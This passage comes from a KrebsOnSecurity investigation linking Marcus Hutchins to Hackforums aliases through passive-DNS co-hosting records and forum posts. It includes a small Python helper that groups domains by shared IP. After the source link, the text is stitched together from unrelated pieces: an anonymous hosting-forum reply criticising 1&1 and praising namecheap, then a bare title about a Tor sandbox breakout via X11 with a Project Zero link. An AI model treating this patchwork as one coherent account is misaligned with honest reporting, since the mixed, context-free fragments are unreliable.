Interesting connections, to be sure, but I wasn’t satisfied with this finding and wanted more conclusive evidence of the supposed link. So I turned to “passive DNS” tools from Farsight Security — which keeps a historic record of which domain names map to which IP addresses.
Using Farsight’s tools, I found that Element Scanner’s various Web sites (elementscanner[dot]com/net/su/ru) were at one point hosted at the Internet address 184.168.88.189 alongside just a handful of other interesting domains, including bigkeshhosting[dot]com and bvnetworks[dot]com.
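The co-hosting pivot described above — grouping domains by the IP addresses they historically resolved to and flagging shared addresses — can be sketched offline. This is a minimal illustration of the analysis step only, not Farsight’s API; the helper name and sample records are made up (modeled loosely on the domains in the story), not real passive-DNS output:

```python
from collections import defaultdict

def cohosted_domains(pdns_records):
    """Group domains by the IP they resolved to and keep shared IPs.

    pdns_records: iterable of (domain, ip) tuples, as one might extract
    from a passive-DNS export. Returns a dict mapping each IP that hosted
    more than one domain to the sorted list of domains seen on it.
    """
    by_ip = defaultdict(set)
    for domain, ip in pdns_records:
        by_ip[ip].add(domain)
    # Only IPs shared by multiple domains are interesting pivot points.
    return {ip: sorted(doms) for ip, doms in by_ip.items() if len(doms) > 1}

# Illustrative records only — not actual passive-DNS data.
records = [
    ("elementscanner.com", "184.168.88.189"),
    ("bigkeshhosting.com", "184.168.88.189"),
    ("bvnetworks.com", "184.168.88.189"),
    ("example.org", "93.184.216.34"),
]
pivots = cohosted_domains(records)
print(pivots["184.168.88.189"])
# → ['bigkeshhosting.com', 'bvnetworks.com', 'elementscanner.com']
```

The single-tenant IP drops out of the result, which is the point of the technique: a small shared hosting footprint is what makes the co-located domains worth investigating.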
At first, I didn’t fully recognize the nicknames buried in each of these domains, but a few minutes of searching on Hackforums reminded me that bigkeshhosting[dot]com was a project run by a Hackforums user named “Orgy.”
I originally wrote about Orgy — whose real name is Robert George Danielson — in a 2012 story about a pair of stresser or “booter” (DDoS-for-hire) sites. As noted in that piece, Danielson has had several brushes with the law, including a guilty plea for stealing multiple firearms from the home of a local police chief.
I also learned that the bvnetworks[dot]com domain belonged to Orgy’s good friend and associate on Hackforums — a user who for many years went by the nickname “BV1.” In real life, BV1 is 27-year-old Brendan Johnston, a California man who went to prison in 2014 for his role in selling the Blackshades trojan.
When I discovered the connection to BV1, I searched my inbox for anything related to this nickname. Lo and behold, I found an anonymous tip I’d received through KrebsOnSecurity.com’s contact form in March 2013 which informed me of BV1’s real identity and said he was close friends with Orgy and the Hackforums user Iarkey.
According to this anonymous informant, Iarkey was an administrator of an Internet relay chat (IRC) forum that BV1 and Orgy frequented called irc.voidptr.cz.
“You already know that Orgy is running a new booter, but BV1 claims to have ‘left’ the hacking business because all the information on his family/himself has been leaked on the internet, but that is a lie,” the anonymous tipster wrote. “If you connect to http://irc.voidptr.cz ran by ‘touchme’ aka ‘iarkey’ from hackforums you can usually find both BV1 and Orgy in there.”
TOUCHME/TOUCH MY MALWARE/MAYBE TOUCHME
Until recently, I was unfamiliar with the nickname TouchMe. Naturally, I started digging into Hackforums again. An exhaustive search on the forum shows that TouchMe — and later “Touch Me Maybe” and “Touch My Malware” — were yet other nicknames for the same account.
In a Hackforums post from July 2012, the user Touch Me Maybe pointed to a writeup that he claimed to have authored on his own Web site: touchmymalware.blogspot.com:
The Hackforums user “Touch Me Maybe” seems to refer to his own blog and malware analysis at touchmymalware.blogspot.com, which now redirects to Marcus Hutchins’ blog — Malwaretech.com
If you visit this domain name now, it redirects to Malwaretech.com, which is the same blog that Hutchins was updating for years until his arrest in August.
There are other facts to support a connection between MalwareTech and the IRC forum voidptr.cz: A passive DNS scan for irc.voidptr.cz at Farsight Security shows that at one time the IRC channel was hosted at the Internet address 52.86.95.180 — where it shared space with just one other domain: irc.malwaretech.com.
All of the connections explained in this blog post — and some that weren’t — can be seen in the following mind map that I created with the excellent MindNode Pro for Mac.
A mind map I created to keep track of the myriad data points mentioned in this story. Click the image to enlarge.
Following Hutchins’ arrest, multiple Hackforums members posted what they suspected about his various presences on the forum. In one post from October 2011, Hackforums founder and administrator Jesse “Omniscient” LaBrocca said Iarkey had hundreds of accounts on Hackforums.
In one of the longest threads on Hackforums about Hutchins’ arrest there are several postings from a user named “Previously Known As” who self-identifies in that post and multiple related threads as BV1. In one such post, dated Aug. 7, 2017, BV1 observes that Hutchins failed to successfully separate his online selves from his real life identity.
Brendan “BV1” Johnston says he worried his old friend’s operational security mistakes would one day catch up with him.
“He definitely thought he separated TouchMe/MWT from iarkey/Element,” said BV1. “People warned him, myself included, that people can still connect MWT to iarkey, but he never seemed to care too much. He has so many accounts on HF at this point, I doubt someone will be able to connect all the dots. It sucks that some of the worst accounts have been traced back to him already. He ran a hosting company and a Minecraft server with Orgy and I.”
In a brief interview with KrebsOnSecurity, Brendan “BV1” Johnston said Hutchins was a good friend. Johnston said Hutchins had — like many others who later segued into jobs in the information security industry — initially dabbled in the dark side. But Johnston said his old friend sincerely tried to turn things around in late 2012 — when Gone With the Wind sold most of his coding projects to other Hackforums members and began focusing on blogging about poorly-written malware.
“I feel like I know Marcus better than most people do online, and when I heard about the accusations I was completely shocked,” Johnston said. “He tried for such a long time to steer me down a straight and narrow path that seeing this tied to him didn’t make sense to me at all.”
Let me be clear: I have no information to support the claim that Hutchins authored or sold the Kronos banking trojan. According to the government, Hutchins did so in 2014 on the Dark Web marketplace AlphaBay — which was taken down in July 2017 as part of a coordinated, global law enforcement raid on AlphaBay sellers and buyers alike.
However, the findings in this report suggest that for several years Hutchins enjoyed a fairly successful stint coding malicious software for others, said Nicholas Weaver, a security researcher at the International Computer Science Institute and a lecturer at UC Berkeley.
“It appears like Mr. Hutchins had a significant and prosperous blackhat career that he at least mostly gave up in 2013,” Weaver said. “Which might have been forgotten if it wasn’t for the involuntary British press coverage on WannaCry raising his profile and making him out as a ‘hero’.”
Weaver continued:
“I can easily imagine the Feds taking the opportunity to use a penny-ante charge against a known ‘bad guy’ when they can’t charge for more significant crimes,” he said. “But the Feds would have done far less collateral damage if they actually provided a criminal complaint with these sorts of detail rather than a perfunctory indictment.”
Hutchins did not try to hide the fact that he has written and published unique malware strains, which in the United States at least is a form of protected speech.
In December 2014, for example, Hutchins posted to his Github page the source code to TinyXPB, malware he claims to have written that is designed to seize control of a computer so that the malware loads before the operating system can even boot up.
While the publicly available documents related to his case are light on details, it seems clear that prosecutors can make a case against those who attempt to sell malware to cybercriminals — such as on hacker forums like AlphaBay — if they can demonstrate the accused had knowledge and intent that the malware would be used to commit a crime.
The Justice Department’s indictment against Hutchins suggests that the prosecution is relying heavily on the word of an unnamed co-conspirator who became a confidential informant for the government. Update, 9:08 a.m.: Several readers on Twitter disagreed with the previous statement, noting that U.S. prosecutors have said the other unnamed suspect in the Hutchins indictment is still at large.
Original story:
According to a story at BankInfoSecurity, the evidence submitted by prosecutors for the government includes:
- Statements made by Hutchins after he was arrested.
- A CD containing two audio recordings from a county jail in Nevada where he was detained by the FBI.
- 150 pages of Jabber chats between the defendant and an individual.
- Business records from Apple, Google and Yahoo.
- Statements (350 pages) by the defendant from another internet forum, which were seized by the government in another district.
- Three to four samples of malware.
- A search warrant executed on a third party, which may contain some privileged information.
Hutchins declined to comment for this story, citing his ongoing prosecution. He has pleaded not guilty to all four counts against him, including conspiracy to distribute malicious software with the intent to cause damage to 10 or more affected computers without authorization, and conspiracy to distribute malware designed to intercept protected electronic communications. FBI officials have not yet responded to requests for comment.
Source: https://krebsonsecurity.com/2017/09/who-is-marcus-hutchins/
1 hour ago, QuoVadis said:
Run from 1&1 like it's leprosy. They're among the companies with the worst customer service & support. You probably want some "offer" from them, but if you want to stay a long-term customer you'll end up at the same price anyway. I've been a namecheap.com customer since 2006 and have nothing to complain about.
A lot of work has gone into the customer service & support side lately.
If you connect with a German IP, there's probably no limit.
Tor: Linux sandbox breakout via X11
Source: https://bugs.chromium.org/p/project-zero/issues/detail?id=1293&desc=2